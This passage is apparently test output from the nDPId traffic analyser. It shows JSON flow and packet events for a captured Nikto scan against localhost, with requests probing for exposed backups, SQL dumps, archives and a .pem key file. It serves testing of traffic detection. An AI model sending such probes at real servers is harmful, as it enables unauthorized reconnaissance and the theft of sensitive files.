-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 